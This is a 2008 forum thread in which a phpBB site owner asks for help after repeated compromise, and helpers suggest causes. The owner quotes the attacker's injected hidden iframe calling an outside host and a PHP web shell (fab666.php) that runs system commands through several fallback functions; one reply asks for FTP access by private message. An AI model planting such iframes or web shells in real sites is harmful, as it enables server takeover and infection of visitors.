Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
November 17, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 680
Members: 0
Total: 680
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> [help] Someone hacking my site! Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
[help] Someone hacking my site!
PostPosted: Sat Mar 08, 2008 6:57 am Reply with quote
abdulbasit
Regular user
Regular user
 
Joined: Mar 07, 2008
Posts: 24




Hello,

Can anyone please help me as someone is hacking my site every 2-3 days by adding it's code in any of my page such as overall_header.tpl, overall_footer.tpl, page_tail.php, page_header.php and many other files with the following code:-

Code:
<td valign="top"><_i_frame__ src="http://pinoc.com/count.php?o=2" width=0 height=0 style="hidden" _frame_border=0 marginheight=0 marginwidth=0 scrolling=no></_i_frame__><table class="blog" cellpadding="0" cellspacing="0"><tr><td valign="top"><div>


Can anyone help me in getting rid of this hacker? He is adding the code anywhere on my server and it seems that some tool/utility/code exists on my server through which the hacker is gaining access and editing any file anytime!
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 8:26 am Reply with quote
abdulbasit
Regular user
Regular user
 
Joined: Mar 07, 2008
Posts: 24




Someone also uploaded a file fab666.php at language/lang_english/fab666.php on my server with the following codes in it

Code:
<?php
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

?>


Can anyone please help me in getting rid of this hacker who is accessing my server and uploading whatever he wants and does what he wants. Changing password doesn't work. All files/folders permission are set right. Still he is gaining access.

I need help please Sad
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 8:34 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Change pass to FTP,cpanel ..etc.
Where you hosting your site?
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 8:44 am Reply with quote
gibbocool
Advanced user
Advanced user
 
Joined: Jan 22, 2008
Posts: 208




Tell us any public applications you have on your site and their version and we can see if there's any public hacks. otherwise someone has found a way in to your site. check logs for the IP and try IP ban.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sat Mar 08, 2008 9:01 am Reply with quote
abdulbasit
Regular user
Regular user
 
Joined: Mar 07, 2008
Posts: 24




gibbocool wrote:
Tell us any public applications you have on your site and their version and we can see if there's any public hacks. otherwise someone has found a way in to your site. check logs for the IP and try IP ban.


I don't have any technical knowledge. Can you please tell me what do you mean by public applications? I know that I have installed phpBB latest version with over 150 MODs on board. I don't know how to check logs for this domain because I am on shared hosting with this domain is ADD ON domain and using Cpanel.
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 9:06 am Reply with quote
abdulbasit
Regular user
Regular user
 
Joined: Mar 07, 2008
Posts: 24




koko wrote:
Change pass to FTP,cpanel ..etc.
Where you hosting your site?


I changed FTP, Cpanel password but there is no use. The hacker doesn't need to have any password and gaining access through some other way.

I am hosted at Lypha.com with Shared Hosting Package
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 9:07 am Reply with quote
Sm0ke
Moderator
Moderator
 
Joined: Nov 25, 2006
Posts: 141
Location: Finland




he have hacked/cracked another site on server so there is nothing you can do exept report your hosting
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 9:12 am Reply with quote
abdulbasit
Regular user
Regular user
 
Joined: Mar 07, 2008
Posts: 24




Sm0ke wrote:
he have hacked/cracked another site on server so there is nothing you can do exept report your hosting


I checked many sites hosted on my shared hosting account but they all are working fine. I mean all the sites which are of others but hosted on my shared server.
The hacker is uploading files to hack my site, also he is adding codes in my files through which my site doesn't operate properly. I am willing to pay some good amount of money if anyone can help me getting rid of this hacker completely.
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 9:50 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




If server sucksss nobody can help you.Make temp ftp account and send info via PM i look.
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 10:03 am Reply with quote
abdulbasit
Regular user
Regular user
 
Joined: Mar 07, 2008
Posts: 24




koko wrote:
If server sucksss nobody can help you.Make temp ftp account and send info via PM i look.


I have requested my host to change server and they will do in 1-2 days. After that I will see what happens and let you guys know what going on...

Thanks for the support everyone Smile
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 10:06 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




If this hacker hide some code in your appz changing server don't help you.
View user's profile Send private message
PostPosted: Sat Mar 08, 2008 10:12 am Reply with quote
abdulbasit
Regular user
Regular user
 
Joined: Mar 07, 2008
Posts: 24




koko wrote:
If this hacker hide some code in your appz changing server don't help you.


What to do then? I don't know where he have stored what file!
Also I don't know to create FTP account to give you access or something because this domain is Add-on domain of the main domain and the hacker is after my Add-on domain on which phpBB is installed. Everything was fine before 2 months and he is attacking every 2-3 days from 2 months!
View user's profile Send private message
PostPosted: Sun Mar 09, 2008 12:40 am Reply with quote
gibbocool
Advanced user
Advanced user
 
Joined: Jan 22, 2008
Posts: 208




He could be using a vulnerability in one of your phpbb mods. Otherwise it's because the host isn't secure. Maybe he made an account on the host just so he can hack all the other websites. You never know.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Sun Mar 09, 2008 12:26 pm Reply with quote
abdulbasit
Regular user
Regular user
 
Joined: Mar 07, 2008
Posts: 24




gibbocool wrote:
He could be using a vulnerability in one of your phpbb mods. Otherwise it's because the host isn't secure. Maybe he made an account on the host just so he can hack all the other websites. You never know.


Which phpBB MOD you think is not secure?
I am moving to other host and will see what happens.

Also I found 1 hacking utility uploaded on my server and I deleted but still he was able to add pinoc.com code in my site!

My site is in public_html so do you think the hacker might have uploaded its utility in any other folder other then public_html ?

Also can you guys tell me some sites where I can submit complaint about this hacker and it's website so that they can take some serious action against him
?

Thank you
View user's profile Send private message
PostPosted: Sun Mar 09, 2008 12:36 pm Reply with quote
gibbocool
Advanced user
Advanced user
 
Joined: Jan 22, 2008
Posts: 208




Get your logs and go through them to find IP and other info about what he's been doing. Then you can report it to your local authorities.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
[help] Someone hacking my site!
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Error messages
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.091 Seconds